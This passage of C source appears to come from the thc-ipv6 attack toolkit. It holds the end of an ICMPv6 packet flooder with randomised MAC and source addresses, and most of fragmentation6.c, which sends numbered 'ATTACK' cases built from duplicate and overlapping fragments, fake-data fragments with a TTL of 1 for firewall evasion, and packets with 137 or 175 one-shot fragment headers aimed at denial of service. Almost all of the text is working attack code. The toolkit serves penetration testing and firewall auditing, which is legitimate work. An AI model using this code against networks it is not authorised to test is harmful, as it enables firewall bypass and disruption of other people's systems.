buf[0] = 1; buf[1] = 1; memcpy(buf + 2, mac6, 6); i = 8; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0) return -1; thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2); hdr = (thc_ipv6_hdr *) pkt2; k = rand(); if (do_hdr_size) offset = do_hdr_size; printf("Starting to flood with ICMPv6 redirects on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { if (rand_mac) { memcpy(hdr->pkt + 8, (char*) &k + _TAKE4, 4); memcpy(hdr->pkt + 14 + 40 + 8 + 2 + 2, (char*) &k + _TAKE4, 4); } if (rand_src) { memcpy(hdr->pkt + 14 + 8 + 8 + 5, (char*) &k + _TAKE3, 3); } if (rand_mac || rand_src) { hdr->pkt[offset + 42] = 0; hdr->pkt[offset + 43] = 0; mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40, pkt_len2 - offset - 40); hdr->pkt[offset + 42] = mychecksum / 256; hdr->pkt[offset + 43] = mychecksum % 256; k++; } count++; if (thc_send_pkt(interface, pkt2, &pkt_len2) < 0) { printf("!"); } // usleep(1); if (count % 1000 == 0) printf("."); if (until > 1) until--; } return 0; } thc-ipv6-2.5/fragmentation6.c0000644000000000000000000022217112251022437014611 0ustar rootroot/* * checks if a firewall performs a check on a second, duplicate fragment * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int matched = 0, gtype1, gtype1a, gtype2, gtype2a, gpos, epos; unsigned char *gpattern, *gsrc, *gdst; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-fp] [-n number] interface destination [test-case-no]\n\n", prg); printf("-f activates flooding mode, no pauses between sends; -p disables first and\n"); printf("final pings, -n number specifies how often each test is performed\n"); printf("\nPerforms 
fragment firewall and implementation checks, incl. denial-of-service.\n"); exit(-1); } int main(int argc, char *argv[]) { int count = 0, only = 0, i, flood = 0, ping = 1, resend = 1, curr = 0; unsigned char buf[1500], bla[1200], tests[256], lbuf[67000]; unsigned char *dst6, *src6; unsigned char *srcmac = NULL, *dstmac = NULL; thc_ipv6_hdr *hdr; int offset = 14, fragsize = 0; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0; char *interface, tos; char ch = 'A'; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "fpn:")) >= 0) { switch (i) { case 'n': resend = atoi(optarg); break; case 'p': ping = 0; break; case 'f': flood = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if (argc - optind > 2 && argv[optind + 2] != NULL) only = atoi(argv[optind + 2]); if (flood && (only == 0 || resend != 1)) { fprintf(stderr, "Error: the -f flood option must be used with a defined testcase, and the -n option can not be used with it\n"); exit(-1); } if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } fragsize = ((200 - 62) / 8) * 8; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); memset(lbuf, 'A', sizeof(lbuf)); printf("Run a sniffer behind the firewall to see what passes through\n\n"); memset(bla, ch++, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 
0xfacebabe, (unsigned char *) &bla, sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /**/ memset(bla, 'Z', sizeof(bla)); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; //dummy, dont remove, incomplete by choice if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; printf("ATTACK initialisation\n"); if (ping) { printf(" Sending ping to %s\n", argv[optind + 1]); thc_ping6(interface, src6, dst6, 10, 1); // printf("Now sleeping for 1 second\n"); sleep(1); } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (2nd real)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data and ttl=1\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 1, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if 
(thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (1st real, 2nd ttl 1)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, 
NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data and ttl=64\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data and ttl=1\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 1, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) 
printf("ATTACK Firewall %d - resending fragments with different data within stream (1st real)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = 
thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data within stream (2nd real)\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore // printf("Now sleeping for 1 second\n"); if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with real data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, 
dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - resending fragments with different data after completion\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + 
offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending third and final fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending duplicate second fragment with fake data\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt2; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - overlapping third fragment into second with valid data\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; 
thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment overlapping into second\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101 - 128 / 8, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808 - 128, 400 + 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400 + 128)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - overlapping third fragment into second\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) 
printf(" Sending second fragment\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400); memset(buf + 400 - 128, 'Z', 128); // bad data we overwrite in next packet if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending third and final fragment overlapping into second\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101 - 128 / 8, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808 - 128, 400 + 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400 + 128)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Firewall %d - overlapping second fragment into third\n", count); if (flood == 0 || curr == 0) printf(" Sending first fragment\n"); hdr = (thc_ipv6_hdr *) pkt; pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 400 + 8); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 408)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending third and final fragment 
- but not the last\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 101, 0, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 808, 400); memset(buf, 'Z', 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" Sending second fragment overlapping into third\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51, 1, count + curr)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 400 + 8, 400 + 128); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 400 + 128)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - one shot fragment\n", count); if (flood == 0 || curr == 0) printf(" Sending one-shot fragment ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xfacebabe + count + curr) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, sizeof(bla), 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d 
- double one shot fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending double one-shot fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xaaaa0000 + count + curr) < 0) return -1; if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xbbbb0000 + count + curr) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, sizeof(bla), 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - 137 one shot fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 137 one-shot fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 137; i++) if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xffff0000 + i + count + (curr << 7)) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, 120, 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - 175 one shot fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 180 one-shot fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 175; i++) if (thc_add_hdr_oneshotfragment(pkt3, &pkt_len3, 0xffff0000 + i + count + (curr << 
7)) < 0) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &bla, 8, 0); thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } curr = 0; if (only == ++count || only == 0) while (curr < resend || flood) { memset(lbuf, only % 256, sizeof(lbuf)); if (flood == 0 || curr == 0) printf("ATTACK Implementation %d - sending 65486 bytes in 54 fragments\n", count); if (flood == 0 || curr == 0) printf(" Sending 54 fragments ping\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt3, &pkt_len3, ICMP6_PINGREQUEST, 0, 0xfacebabe + count + curr, (unsigned char *) &lbuf, 65486, 0); thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore hdr = (thc_ipv6_hdr *) pkt3; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + 